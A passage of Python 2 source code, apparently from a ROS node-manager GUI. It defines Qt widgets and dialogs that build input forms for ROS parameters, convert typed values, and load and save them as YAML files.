self._base_type, self._is_array_type, self._array_length = roslib.msgs.parse_type(self._type)
except Exception:
pass
if msg_type == 'binary':
self._base_type = msg_type
def _read_value(self, value):
if isinstance(value, dict):
for key, val in value.items():
if key.startswith(':'):
if key == ':value':
self._value = val
self._value_org = val
elif key == ':ro':
self.read_only = val
elif key == ':hint':
self.hint = val
elif key == ':path':
self.path_type = val
elif key == ':min':
self._min = val
elif key == ':max':
self._max = val
self._tags[key] = val
else:
self._value = value
self._value_org = value
def __repr__(self):
return "%s [%s]: %s" % (self._name, self._type, utf8(self._value))
@classmethod
def is_primitive_type(cls, value_type):
result = value_type in roslib.msgs.PRIMITIVE_TYPES
result = result or value_type in ['string', 'int', 'float', 'time', 'duration', 'binary', 'unicode']
return result
def add_tag(self, key, value):
self._tags[key] = value
def origin_value(self):
return self._value_org
def clear_origin_value(self):
self._value_org = None
def changed(self):
return utf8(self.origin_value()) != utf8(self._value)
def name(self):
return self._name
def setWidget(self, widget):
self._widget = widget
if widget is not None:
self.addCachedValuesToWidget()
def widget(self):
return self._widget
def fullName(self):
result = self.name()
widget = self._widget
while widget is not None:
if isinstance(widget, (MainBox, GroupBox, ArrayBox)):
result = roslib.names.ns_join(widget.name, result)
widget = widget.parent()
return result
def isArrayType(self):
# handle representation of `rosparam`
return self._is_array_type or (self._type in ['[]'])
def arrayLength(self):
return self._array_length
def isPrimitiveType(self):
result = self.is_primitive_type(self._base_type)
# if value is a string, the list is represented as a string, see `rosparam`
result = result or self._type in ['[]']
return result
def isTimeType(self):
return self._base_type in ['time', 'duration']
def isBinaryType(self):
return self._base_type in ['binary']
def baseType(self):
return self._base_type
def msgType(self):
return self._type
def updateValueFromField(self):
if self.read_only:
# do no change any values
return
result = self.widget().current_text()
self._value = self.updateValue(result, raise_on_min_max=False)
if self.changed():
nm.history().addParamCache(self.fullName(), self._value)
def updateValue(self, value, raise_on_min_max=True):
rvalue = value
try:
if isinstance(value, (dict, list)):
rvalue = value
elif value:
if self.isArrayType():
if 'int' in self.baseType() or 'byte' in self.baseType():
rvalue = map(int, value.lstrip('[').rstrip(']').split(','))
elif 'float' in self.baseType():
rvalue = map(float, value.lstrip('[').rstrip(']').split(','))
elif 'bool' in self.baseType():
rvalue = map(str2bool, value.lstrip('[').rstrip(']').split(','))
elif self.isBinaryType():
rvalue = value
else:
try:
rvalue = value.lstrip('[').rstrip(']')
rvalue = ruamel.yaml.load("[%s]" % rvalue, Loader=ruamel.yaml.Loader)
# if there is no YAML, load() will return an
# empty string. We want an empty dictionary instead
# for our representation of empty.
if rvalue is None:
rvalue = []
except ruamel.yaml.MarkedYAMLError, e:
raise Exception("Field [%s] yaml error: %s" % (self.fullName(), utf8(e)))
if self.arrayLength() is not None and self.arrayLength() != len(rvalue):
raise Exception(''.join(["Field [", self.fullName(), "] has incorrect number of elements: ", utf8(len(rvalue)), " != ", str(self.arrayLength())]))
else:
if 'int' in self.baseType() or 'byte' in self.baseType():
rvalue = int(value)
elif 'float' in self.baseType():
rvalue = float(value)
elif 'bool' in self.baseType():
if isinstance(value, bool):
rvalue = value
else:
rvalue = str2bool(value)
elif self.isBinaryType():
rvalue = utf8(value)
elif self.isTimeType():
if value == 'now':
rvalue = 'now'
else:
try:
val = eval(value)
if isinstance(val, dict):
rvalue = val
else:
secs = int(val)
nsecs = int((val - secs) * 1000000000)
rvalue = {'secs': secs, 'nsecs': nsecs}
except Exception:
rvalue = {'secs': 0, 'nsecs': 0}
else:
rvalue = value.encode(sys.getfilesystemencoding())
else:
if self.isArrayType():
arr = []
rvalue = arr
else:
if 'int' in self.baseType() or 'byte' in self.baseType():
rvalue = 0
elif 'float' in self.baseType():
rvalue = 0.0
elif 'bool' in self.baseType():
rvalue = False
elif self.isBinaryType():
rvalue = utf8(value)
elif self.isTimeType():
rvalue = {'secs': 0, 'nsecs': 0}
else:
rvalue = ''
except Exception, e:
raise Exception("Error while set value '%s', for '%s': %s" % (utf8(value), self.fullName(), utf8(e)))
if self._min is not None:
if rvalue < self._min:
if raise_on_min_max:
raise Exception("%s is smaller than minimum: %s" % (utf8(rvalue), utf8(self._min)))
rvalue = self._min
if self._max is not None:
if rvalue > self._max:
if raise_on_min_max:
raise Exception("%s is greater than maximum: %s" % (utf8(rvalue), utf8(self._max)))
rvalue = self._max
return rvalue
def value(self, with_tags=False):
if not self.isPrimitiveType() and not self.widget() is None:
return self.widget().value(with_tags)
elif self.isPrimitiveType():
self.updateValueFromField()
if with_tags:
result = {}
result.update(self._tags)
result[':value'] = self._value
return result
return self._value
def removeCachedValue(self, value):
nm.history().removeParamCache(self.fullName(), value)
def createTypedWidget(self, parent):
result = None
if self.isPrimitiveType():
result = ValueWidget(self, parent)
else:
if self.isArrayType():
result = ArrayBox(self.name(), self._type, dynamic=self.arrayLength() is None, parent=parent)
else:
result = GroupBox(self.name(), self._type, parent=parent)
return result
def addCachedValuesToWidget(self):
if isinstance(self.widget(), ValueWidget):
self.widget().add_cached_values()
class MainBox(QFrame):
'''
Groups the parameter without visualization of the group. It is the main widget.
'''
def __init__(self, name, param_type, collapsible=True, parent=None):
QFrame.__init__(self, parent)
self.setObjectName(name)
self.name = name
self.type_msg = param_type
self.params = []
self.collapsed = False
self.parameter_description = None
vLayout = QVBoxLayout(self)
vLayout.setContentsMargins(1, 1, 1, 1)
vLayout.setSpacing(1)
self.param_widget = QFrame(self)
self.collapsible = collapsible
if collapsible:
self.options_layout = QHBoxLayout()
self.options_layout.setContentsMargins(1, 1, 1, 1)
self.options_layout.setSpacing(1)
self.hide_button = QPushButton('-')
self.hide_button.setFlat(True)
self.hide_button.setMaximumSize(20, 20)
self.hide_button.clicked.connect(self._on_hide_clicked)
self.name_label = QLabel(name)
font = self.name_label.font()
font.setBold(True)
self.name_label.setFont(font)
self.options_layout.addWidget(self.hide_button)
self.options_layout.addWidget(self.name_label)
self.type_label = QLabel('(%s)' % param_type)
self.options_layout.addWidget(self.type_label)
self.options_layout.addStretch()
vLayout.addLayout(self.options_layout)
self.param_widget.setFrameShape(QFrame.StyledPanel)
self.param_widget.setFrameShadow(QFrame.Sunken)
boxLayout = QFormLayout(self.param_widget)
boxLayout.setContentsMargins(3, 3, 3, 3)
boxLayout.setVerticalSpacing(1)
vLayout.addWidget(self.param_widget)
if param_type in ['std_msgs/Header']:
self.setCollapsed(True)
def setCollapsed(self, value):
self.collapsed = value
self.param_widget.setVisible(not value)
self.hide_button.setText('+' if self.collapsed else '-')
def _on_hide_clicked(self):
self.setCollapsed(not self.collapsed)
# self.param_widget.setVisible(not self.param_widget.isVisible())
# vis = self.param_widget.isVisible()
# self.hide_button.setText('-' if vis else '+')
def createFieldFromValue(self, value, clear_origin_value=False):
self.setUpdatesEnabled(False)
try:
if isinstance(value, (dict, list)):
self._createFieldFromDict(value, clear_origin_value=clear_origin_value)
except Exception:
print(traceback.format_exc())
finally:
self.setUpdatesEnabled(True)
def _createFieldFromDict(self, value, layout=None, clear_origin_value=False):
if layout is None:
layout = self.param_widget.layout()
# sort the items: 1. header, 2. all primitives (sorted), 3. list, dict (sorted)
all_params = []
primitives = []
komplex = []
for name, val in value.items():
_type = type(val).__name__
if isinstance(val, dict):
if ':type' in val:
_type = val[':type']
elif ':value' in val:
_type = type(val[':value']).__name__
if _type == 'str':
_type = 'string'
if _type in ['std_msgs/Header']:
all_params.append((name, _type, val))
elif ParameterDescription.is_primitive_type(_type):
primitives.append((name, _type, val))
else:
komplex.append((name, _type, val))
all_params.extend(sorted(primitives))
all_params.extend(sorted(komplex))
# create widgets
for name, _type, val in all_params:
if name.startswith(':'):
continue
# search for existing field
field = self.getField(name)
if field is None:
# add parameter object first
param_desc = ParameterDescription(name, _type, val)
# create widget for parameter
field = param_desc.createTypedWidget(self)
if clear_origin_value:
param_desc.clear_origin_value()
param_desc.setWidget(field)
self.params.append(param_desc)
if isinstance(field, (GroupBox, ArrayBox)):
field.createFieldFromValue(val[':value'] if ':value' in val else val, clear_origin_value)
layout.addRow(field)
else:
# we have e simple parameter, create label for it
label_name = name if _type in ['string', 'str', 'unicode', 'bool'] else '%s (%s)' % (name, _type)
label = QLabel(label_name, self)
label.setObjectName('%s_label' % name)
label.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding))
hint = field.toolTip()
if hint:
label.setToolTip(hint)
# whatsThis destroys the layout
# label.whatsThis(hint)
label.setBuddy(field)
layout.addRow(label, field)
else:
# field exists already -> update groups or arrays
if isinstance(field, (GroupBox, ArrayBox)):
field.createFieldFromValue(val[':value'] if ':value' in val else val, clear_origin_value)
else:
raise Exception("Parameter with name '%s' already exists!" % name)
def value(self, with_tags=False, only_changed=False):
result = dict()
for param in self.params:
if not param.isBinaryType():
if param.isPrimitiveType():
val = param.value(with_tags=with_tags)
if param.changed() or not only_changed:
result[param.name()] = val
else:
val = param.value(with_tags=with_tags)
if val or not only_changed:
result[param.name()] = val
return result
def set_values(self, values):
'''
Sets the values for existing fields. Used e.g. while load parameter from file
:param dict values: the dictionary with values to set.
:raise Exception: on errors
'''
if isinstance(values, dict):
for param, val in values.items():
value = val
_type = 'unknown'
if isinstance(val, tuple):
# backward compatibility
(_type, value) = val
elif isinstance(val, dict):
if ':value' in val:
value = val[':value']
if ':type' in val:
_type = val[':type']
field = self.getField(param)
if field is not None:
if isinstance(field, (GroupBox, ArrayBox)):
field.set_values(value)
else:
field.set_value(value)
elif isinstance(values, list):
raise Exception("Setting 'list' values in MainBox or GroupBox not supported!!!")
def getField(self, name, recursive=False):
for child in self.children():
for c in child.children():
if recursive and isinstance(c, MainBox):
result = c.getField(name, recursive=recursive)
if result is not None:
return result
elif c.objectName() == name:
return c
return None
def removeAllFields(self):
'''
Remove the references between parameter and corresponding widgets
(ComboBox, CheckBox, ..) and remove these widgets from layouts.
'''
for child in self.param_widget.children():
if isinstance(child, MyComboBox):
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
elif isinstance(child, MainBox):
child.removeAllFields()
self.param_widget.layout().removeWidget(child)
def filter(self, arg, force_show=False):
'''
Hide the parameter input field, which label dosn't contains the C{arg}.
:param str arg: the filter text
:param bool force_show: override filter, if group is shown
'''
result = False
for child in self.param_widget.children():
if isinstance(child, (MainBox, GroupBox, ArrayBox)):
show = force_show or not arg
if not show:
show = child.objectName().lower().find(arg) != -1
show = child.filter(arg, force_show=show) or show
# hide group, if no parameter are visible
child.setVisible(show)
if show:
child.setCollapsed(False)
result = True
elif isinstance(child, ValueWidget):
label = child.parentWidget().layout().labelForField(child)
if label is not None:
show = force_show or not arg
if not show:
show = child.current_text().lower().find(arg) != -1 or label.text().lower().find(arg) != -1
# set the parent group visible if it is not visible
if show and not child.parentWidget().isVisible():
child.parentWidget().setVisible(show)
label.setVisible(show)
child.setVisible(show)
if show:
result = True
return result
def setVisible(self, arg):
if arg and not self.parentWidget() is None and not self.parentWidget().isVisible():
self.parentWidget().setVisible(arg)
QWidget.setVisible(self, arg)
class GroupBox(MainBox):
'''
Groups the parameter of a dictionary, struct or class using the group box for
visualization.
'''
def __init__(self, name, param_type, parent=None):
MainBox.__init__(self, name, param_type, True, parent)
self.setObjectName(name)
class ArrayEntry(MainBox):
'''
A part of the ArrayBox to represent the elements of a list.
'''
def __init__(self, index, param_type, parent=None):
MainBox.__init__(self, '#%s' % utf8(index), param_type, True, parent)
self.index = index
self.setObjectName(''.join(['[', utf8(index), ']']))
self.param_widget.setFrameShape(QFrame.Box)
self.param_widget.setFrameShadow(QFrame.Plain)
self.type_label.setVisible(False)
# boxLayout = QFormLayout()
# boxLayout.setVerticalSpacing(0)
# label = QLabel(''.join(['[', str(index), ']']))
# self.param_widget.layout().addRow(label)
# self.setLayout(boxLayout)
def value(self, with_tags=False, only_changed=False):
'''
Retruns a dictionary for an entry of an array, e.g. {name: value}.
If with_tags is True it looks like: {name: {':value': value, ':type': type}}
:rtype: dict
'''
result = dict()
for param in self.params:
val = param.value(with_tags)
if val or not only_changed:
result[param.name()] = val
return result
class ArrayBox(MainBox):
'''
Groups the parameter of a list.
'''
def __init__(self, name, param_type, dynamic, parent=None):
MainBox.__init__(self, name, param_type, True, parent)
self._is_dynamic = dynamic
self._dynamic_value = None
self._dynamic_widget = None
self._dynamic_items_count = 0
def addDynamicBox(self):
self._dynamic_items_count = 0
addButton = QPushButton("+")
addButton.setMaximumSize(25, 25)
addButton.clicked.connect(self._on_add_dynamic_entry)
self.options_layout.addWidget(addButton)
self.count_label = QLabel('0')
self.options_layout.addWidget(self.count_label)
remButton = QPushButton("-")
remButton.setMaximumSize(25, 25)
remButton.clicked.connect(self._on_rem_dynamic_entry)
self.options_layout.addWidget(remButton)
def _on_add_dynamic_entry(self, checked=False, value=None):
self.setUpdatesEnabled(False)
try:
val = value
if val is None:
val = self._dynamic_value
if val is not None:
self._create_dynamic_frame(val)
finally:
self.setUpdatesEnabled(True)
def _create_dynamic_frame(self, value):
entry_frame = ArrayEntry(self._dynamic_items_count, self.type_msg)
self.param_widget.layout().addRow(entry_frame)
entry_frame._createFieldFromDict(value)
self._dynamic_items_count += 1
self.count_label.setText(utf8(self._dynamic_items_count))
def _on_rem_dynamic_entry(self):
if self._dynamic_items_count > 0:
self._dynamic_items_count -= 1
item = self.param_widget.layout().takeAt(self._dynamic_items_count)
self.param_widget.layout().removeItem(item)
try:
# remove the referenced parameter, too
for child in item.widget().children():
if isinstance(child, MyComboBox):
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
elif isinstance(child, MainBox):
child.removeAllFields()
self.param_widget.layout().removeWidget(child)
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
item.widget().setParent(None)
del item
except Exception:
print(traceback.format_exc(3))
self.count_label.setText(utf8(self._dynamic_items_count))
def createFieldFromValue(self, value, clear_origin_value=False):
self.setUpdatesEnabled(False)
try:
if self._is_dynamic:
self.addDynamicBox()
# Set value used to add dynamic array fields.
# On republish there is an array filled array. So only last enry will be used on add new entry.
if isinstance(value, list):
if value:
self._dynamic_value = value[-1]
else:
self._dynamic_value = value
self.set_values(value)
except Exception:
print(traceback.format_exc())
finally:
self.setUpdatesEnabled(True)
def value(self, with_tags=False, only_changed=False):
'''
Goes through the list and creates dictionary with values of each element.
Returns a list with dictionaries, e.g. [{name: value}, {name: value}].
If with_tags is True the result is a dictionary, e.g. {':type': type[], ':value': [{name: value}, {name: value}]}
:rtype: list or dict, if with_tags==True
'''
result_list = list()
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
value = item.widget().value(with_tags=with_tags, only_changed=only_changed)
result_list.append(value)
result = result_list
if with_tags:
result = {}
result[':type'] = self.type_msg
result[':value'] = result_list
return result
def set_values(self, values):
'''
Create a list of the elements and sets their values.
:param list values: The list of dictionaries with parameter values
'''
if isinstance(values, list):
count_entries = 0
# determine the count of existing elements
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
count_entries += 1
# create the list of the elements of the length of values
if count_entries < len(values):
for i in range(len(values) - count_entries):
# use array entry
self._on_add_dynamic_entry(value=values[i])
elif count_entries > len(values):
for i in range(count_entries - len(values)):
self._on_rem_dynamic_entry()
# set the values
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
item.widget().set_values(values[i])
class ScrollArea(QScrollArea):
'''
ScrollArea provides the maximal width of the internal widget.
'''
def viewportEvent(self, arg):
if self.widget() and self.viewport().size().width() != self.widget().maximumWidth():
self.widget().setMaximumWidth(self.viewport().size().width())
return QScrollArea.viewportEvent(self, arg)
class ParameterDialog(QDialog):
'''
This dialog creates an input mask for the given parameter and their types.
'''
def __init__(self, params=dict(), buttons=QDialogButtonBox.Cancel | QDialogButtonBox.Ok, sidebar_var='', parent=None, store_geometry=''):
'''
Creates an input dialog.
:param dict params: a (recursive) dictionary with parameter names and their values.
A value can be of primitive type (int, bool, string), a list or dictionary. If it is
of list type, the list should contains dictionaries with parameter and values.
If value is of dictionary type it is a recursive include or value with tags.
If it is a recursive include a group will be created. The key is the name of the group.
If it is a value with tags it should contains at least a ':value' tag.
All attributes begin with ':'. Other key attributes:
-':type': type, overwrites the autodetection
-':ro': read only
-':hint': description of the parameter
-':default': default value
-':min': minimum value
-':max': maximum value
-':alt': a list of alternative values
-'path': 'dir' or 'file'
:param str sidebar_var: the name of the key in first level of params. Creates a sidebar if
it is not empty. Cached and alternative values are used to fill the sidebar.
'''
QDialog.__init__(self, parent=parent)
self.setObjectName('ParameterDialog - %s' % utf8(params))
self.__current_path = nm.settings().current_dialog_path
self.horizontalLayout = QHBoxLayout(self)
self.horizontalLayout.setObjectName("horizontalLayout")
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setSpacing(0)
self.verticalLayout = QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.verticalLayout.setContentsMargins(3, 3, 3, 3)
# add filter row
self.filter_field = EnhancedLineEdit(self)
self.filter_field.setPlaceholderText("filter")
self.filter_field.textChanged.connect(self._on_filter_changed)
self.filter_visible = True
self.verticalLayout.addWidget(self.filter_field)
# create area for the parameter
self.scrollArea = scrollArea = ScrollArea(self)
scrollArea.setObjectName("scrollArea")
self.content = MainBox('/', 'string', False, self)
scrollArea.setFrameStyle(QFrame.NoFrame)
scrollArea.setWidget(self.content)
scrollArea.setWidgetResizable(True)
self.verticalLayout.addWidget(scrollArea)
# add info text field
self.info_field = QTextEdit(self)
palette = QPalette()
brush = QBrush(QColor(255, 254, 242))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Active, QPalette.Base, brush)
brush = QBrush(QColor(255, 254, 242))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Inactive, QPalette.Base, brush)
brush = QBrush(QColor(244, 244, 244))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Disabled, QPalette.Base, brush)
self.info_field.setPalette(palette)
self.info_field.setFrameShadow(QFrame.Plain)
self.info_field.setReadOnly(True)
self.info_field.setTextInteractionFlags(Qt.LinksAccessibleByKeyboard | Qt.LinksAccessibleByMouse | Qt.TextBrowserInteraction | Qt.TextSelectableByKeyboard | Qt.TextSelectableByMouse)
self.info_field.setObjectName("dialog_info_field")
self.verticalLayout.addWidget(self.info_field)
self.info_field.setVisible(False)
# create buttons
self.buttonBox = QDialogButtonBox(self)
self.buttonBox.setObjectName("buttonBox")
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(buttons)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.verticalLayout.addWidget(self.buttonBox)
self.horizontalLayout.addLayout(self.verticalLayout)
# add side bar for checklist
values = nm.history().cachedParamValues('/%s' % sidebar_var)
self.sidebar_frame = QFrame(self)
self.sidebar_frame.setObjectName(sidebar_var)
sidebarframe_verticalLayout = QVBoxLayout(self.sidebar_frame)
sidebarframe_verticalLayout.setObjectName("sidebarframe_verticalLayout")
sidebarframe_verticalLayout.setContentsMargins(3, 3, 3, 3)
self._sidebar_selected = 0
if len(values) > 0 and sidebar_var in params:
self.horizontalLayout.addWidget(self.sidebar_frame)
try:
if ':value' in params[sidebar_var]:
self.sidebar_default_val = params[sidebar_var][':value']
else:
self.sidebar_default_val = params[sidebar_var][1]
# add default value to sidebar
if self.sidebar_default_val and self.sidebar_default_val not in values:
values.append(self.sidebar_default_val)
except Exception:
self.sidebar_default_val = ''
values.sort()
for v in values:
checkbox = QCheckBox(v)
checkbox.setObjectName(v)
checkbox.stateChanged.connect(self._on_sidebar_stateChanged)
self.sidebar_frame.layout().addWidget(checkbox)
self.sidebar_frame.layout().addItem(QSpacerItem(100, 20, QSizePolicy.Minimum, QSizePolicy.Expanding))
# set the input fields
if params:
try:
self.content.createFieldFromValue(params)
self.setInfoActive(False)
except Exception:
print(traceback.format_exc())
if self.filter_field.isVisible():
self.filter_field.setFocus()
# restore from configuration file
self._geometry_name = store_geometry
if store_geometry and nm.settings().store_geometry:
settings = nm.settings().qsettings(nm.settings().CFG_GUI_FILE)
self._history_selected_robot = settings.value("selected_robot", '')
settings.beginGroup(store_geometry)
self.resize(settings.value("size", QSize(600, 300)))
pos = settings.value("pos", QPoint(0, 0))
if pos.x() != 0 and pos.y() != 0:
self.move(pos)
settings.endGroup()
def __del__(self):
self.content.removeAllFields()
def _on_sidebar_stateChanged(self, state):
if state == Qt.Checked:
self._sidebar_selected += 1
elif state == Qt.Unchecked:
self._sidebar_selected -= 1
if self._sidebar_selected in [0, 1]:
try:
field = self.content.getField(self.sidebar_frame.objectName())
if field is not None and field.currentText() == self.sidebar_default_val:
field.setEnabled(True if self._sidebar_selected == 0 else False)
except Exception:
pass
def showLoadSaveButtons(self):
self.load_button = QPushButton()
self.load_button.setIcon(QIcon(':/icons/load.png'))
self.load_button.clicked.connect(self._load_parameter)
self.load_button.setToolTip('Load parameters from YAML file')
self.load_button.setFlat(True)
self.buttonBox.addButton(self.load_button, QDialogButtonBox.ActionRole)
self.save_button = QPushButton()
self.save_button.clicked.connect(self._save_parameter)
self.save_button.setIcon(QIcon(':/icons/save.png'))
self.save_button.setToolTip('Save parameters to YAML file')
self.save_button.setFlat(True)
self.buttonBox.addButton(self.save_button, QDialogButtonBox.ActionRole)
def _on_filter_changed(self):
self.content.filter(self.filter_field.text().lower())
def setFilterVisible(self, val):
'''
Shows or hides the filter row.
'''
self.filter_visible = val
self.filter_field.setVisible(val & self.scrollArea.isHidden())
def add_warning(self, message):
label = QLabel(self)
label.setWordWrap(True)
label.setText(''.join(["<font color='red'>Warning!\n", message, "</font>"]))
self.verticalLayout.insertWidget(1, label)
def setText(self, text):
'''
Adds a label to the dialog's layout and shows the given text.
:param str text: the text to add to the dialog
'''
self.info_field.setText(text)
self.setInfoActive(True)
def setInfoActive(self, val):
'''
Activates or deactivates the info field of this dialog. If info field is
activated, the filter frame and the input field are deactivated.
:param bool val: state
'''
if val and self.info_field.isHidden():
self.filter_field.setVisible(False & self.filter_visible)
self.scrollArea.setVisible(False)
self.info_field.setVisible(True)
elif not val and self.scrollArea.isHidden():
self.filter_field.setVisible(True & self.filter_visible)
self.scrollArea.setVisible(True)
self.info_field.setVisible(False)
if self.filter_field.isVisible():
self.filter_field.setFocus()
def setFocusField(self, field_label):
field = self.content.getField(field_label, recursive=True)
if field is not None:
field.setFocus()
def getKeywords(self, only_changed=False, with_tags=False):
'''
:param bool only_changed: returns changed parameter only (Defaul: False)
:param bool with_tags: returns parameter attributes (e.g. :ro, :hint,...) (Defaul: False)
:returns a directory with parameter and value for entered fields.
:rtype: dict
'''
# get the results of sidebar
sidebar_list = []
sidebar_name = self.sidebar_frame.objectName()
for j in range(self.sidebar_frame.layout().count() - 1):
w = self.sidebar_frame.layout().itemAt(j).widget()
if isinstance(w, QCheckBox):
if w.checkState() == Qt.Checked:
sidebar_list.append(w.objectName())
result_value = self.content.value(with_tags, only_changed)
# add the sidebar results
if sidebar_name in result_value:
# skip the default value, if elements are selected in the side_bar
sidebar_value = ''
if with_tags:
sidebar_value = result_value[sidebar_name][':value']
else:
sidebar_value = result_value[sidebar_name]
if len(sidebar_list) == 0 or self.sidebar_default_val != sidebar_value:
sidebar_list.append(sidebar_value)
if with_tags:
result_value[sidebar_name][':value'] = [v for v in set(sidebar_list)]
else:
result_value[sidebar_name] = [v for v in set(sidebar_list)]
return result_value
def keywords2params(self, keywords):
'''
Resolves the dictionary values to ROS parameter names.
:param keywords: the result of the getKeywords
:return: dictionary of (ROS parameter name : value)
'''
result = dict()
for param, value in keywords.items():
if isinstance(value, dict):
r = self.keywords2params(value)
for p, v in r.items():
result[roslib.names.ns_join(param, p)] = v
else:
result[param] = value
return result
@classmethod
def remove_attributes(cls, keywords):
# it it is a value dictionary, we need only :value attribute
if ':value' in keywords:
return keywords[':value']
# remove all attributes which starts with ':'
result = {}
for key, val in keywords.items():
clean_val = val
if isinstance(val, dict):
clean_val = cls.remove_attributes(val)
if not key.startswith(':'):
result[key] = clean_val
return result
def _save_parameter(self):
try:
(fileName, _) = QFileDialog.getSaveFileName(self,
"Save parameter",
self.__current_path,
"YAML files (*.yaml);;All files (*)")
if fileName:
self.__current_path = os.path.dirname(fileName)
nm.settings().current_dialog_path = os.path.dirname(fileName)
content = self.content.value(with_tags=True)
buf = ruamel.yaml.compat.StringIO()
ruamel.yaml.dump(content, buf, Dumper=ruamel.yaml.RoundTripDumper)
with open(fileName, 'w+') as f:
f.write(buf.getvalue())
except Exception as e:
print(traceback.format_exc(3))
MessageBox.warning(self, "Save parameter Error",
'Error while save parameter',
utf8(e))
def _load_parameter(self):
try:
(fileName, _) = QFileDialog.getOpenFileName(self, "Load parameter",
self.__current_path,
"YAML files (*.yaml);;All files (*)")
if fileName:
self.__current_path = os.path.dirname(fileName)
nm.settings().current_dialog_path = os.path.dirname(fileName)
with open(fileName, 'r') as f:
# print yaml.load(f.read())
self.content.set_values(ruamel.yaml.load(f.read(), Loader=ruamel.yaml.Loader))
except Exception as e:
print(traceback.format_exc())
MessageBox.warning(self, "Load parameter Error",
'Error while load parameter',
utf8(e))
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%% close handling %%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def _store_geometry(self):
if self._geometry_name:
settings = nm.settings().qsettings(nm.settings().CFG_GUI_FILE)
settings.beginGroup(self._geometry_name)
settings.setValue("size", self.size())
settings.setValue("pos", self.pos())
settings.endGroup()
def accept(self):
self._store_geometry()
self.setResult(QDialog.Accepted)
self.accepted.emit()
if self.isModal():
self.hide()
def reject(self):
self._store_geometry()
self.setResult(QDialog.Rejected)
self.rejected.emit()
self.hide()
def hideEvent(self, event):
self.close()
def closeEvent(self, event):
'''
Test the open files for changes and save this if needed.
'''
self.setAttribute(Qt.WA_DeleteOnClose, True)
if self.result() == QDialog.Accepted:
event.setAccepted(False)
QDialog.closeEvent(self, event)
class MasterParameterDialog(ParameterDialog):
'''
This dialog is an extension to the L{ParameterDialog}. The parameter and their
values are requested from the ROS master parameter server. The requests are
threaded and allows the also threaded changed of ROS parameter assigned to
given namespace.
'''
def __init__(self, masteruri, ns='/', parent=None, store_geometry=''):
'''
:param str masteruri: if the master uri is not None, the parameter are retrieved from ROS parameter server.
:param str ns: namespace of the parameter retrieved from the ROS parameter server.
'''
ParameterDialog.__init__(self, dict(), parent=parent, store_geometry=store_geometry)
self.masteruri = masteruri
self.ns = ns
self.is_delivered = False
self.is_send = False
self.mIcon = QIcon(":/icons/default_cfg.png")
self.setWindowIcon(self.mIcon)
# self.resize(450, 300)
self.add_new_button = QPushButton()
self.add_new_button.setIcon(QIcon(':/icons/crystal_clear_add.png'))
self.add_new_button.clicked.connect(self._on_add_parameter)
self.add_new_button.setToolTip('Adds a new parameter to the list')
self.add_new_button.setFlat(True)
self.buttonBox.addButton(self.add_new_button, QDialogButtonBox.ActionRole)
self.showLoadSaveButtons()
# self.apply_button = QPushButton(self.tr("&Ok"))
# self.apply_button.clicked.connect(self._on_apply)
# self.buttonBox.addButton(self.apply_button, QDialogButtonBox.ApplyRole)
# self.buttonBox.accepted.connect(self._on_apply)
self.setText(' '.join(['Obtaining parameters from the parameter server', masteruri, '...']))
self.parameterHandler = ParameterHandler()
self.parameterHandler.parameter_list_signal.connect(self._on_param_list)
self.parameterHandler.parameter_values_signal.connect(self._on_param_values)
self.parameterHandler.delivery_result_signal.connect(self._on_delivered_values)
self.parameterHandler.requestParameterList(masteruri, ns)
# self.apply_button.setFocus(Qt.OtherFocusReason)
def accept(self):
if self.masteruri is not None and not self.is_send:
try:
params = self.getKeywords(True)
params = self.keywords2params(params)
ros_params = dict()
for p, v in params.items():
rospy.logdebug("updated parameter: %s, %s, %s", p, utf8(v), type(v))
ros_params[roslib.names.ns_join(self.ns, p)] = v
if ros_params:
self.is_send = True
self.setText('Sends parameters to the server...')
self.parameterHandler.deliverParameter(self.masteruri, ros_params)
else:
self.close()
except Exception, e:
print(traceback.format_exc(3))
MessageBox.warning(self, self.tr("Warning"), utf8(e))
elif self.masteruri is None:
MessageBox.warning(self, self.tr("Error"), 'Invalid ROS master URI')
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%% ROS parameter handling %%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def _on_add_parameter(self):
params_arg = {'namespace': {':type': 'string', ':value': self.ns},
'name': {':type': 'string', ':value': ''},
'type': {':type': 'string', ':value': ['string', 'int', 'float', 'bool', 'list']},
'value': {':type': 'string', ':value': ''}
}
dia = ParameterDialog(params_arg, store_geometry='add_parameter_in_master_dialog')
dia.setWindowTitle('Add new parameter')
dia.setFilterVisible(False)
if dia.exec_():
try:
params = dia.getKeywords()
if params['name']:
if params['type'] == 'int':
value = int(params['value'])
elif params['type'] == 'float':
value = float(params['value'])
elif params['type'] == 'bool':
value = str2bool(params['value'])
elif params['type'] == 'list':
try:
value = ruamel.yaml.load("[%s]" % params['value'], Loader=ruamel.yaml.Loader)
# if there is no YAML, load() will return an
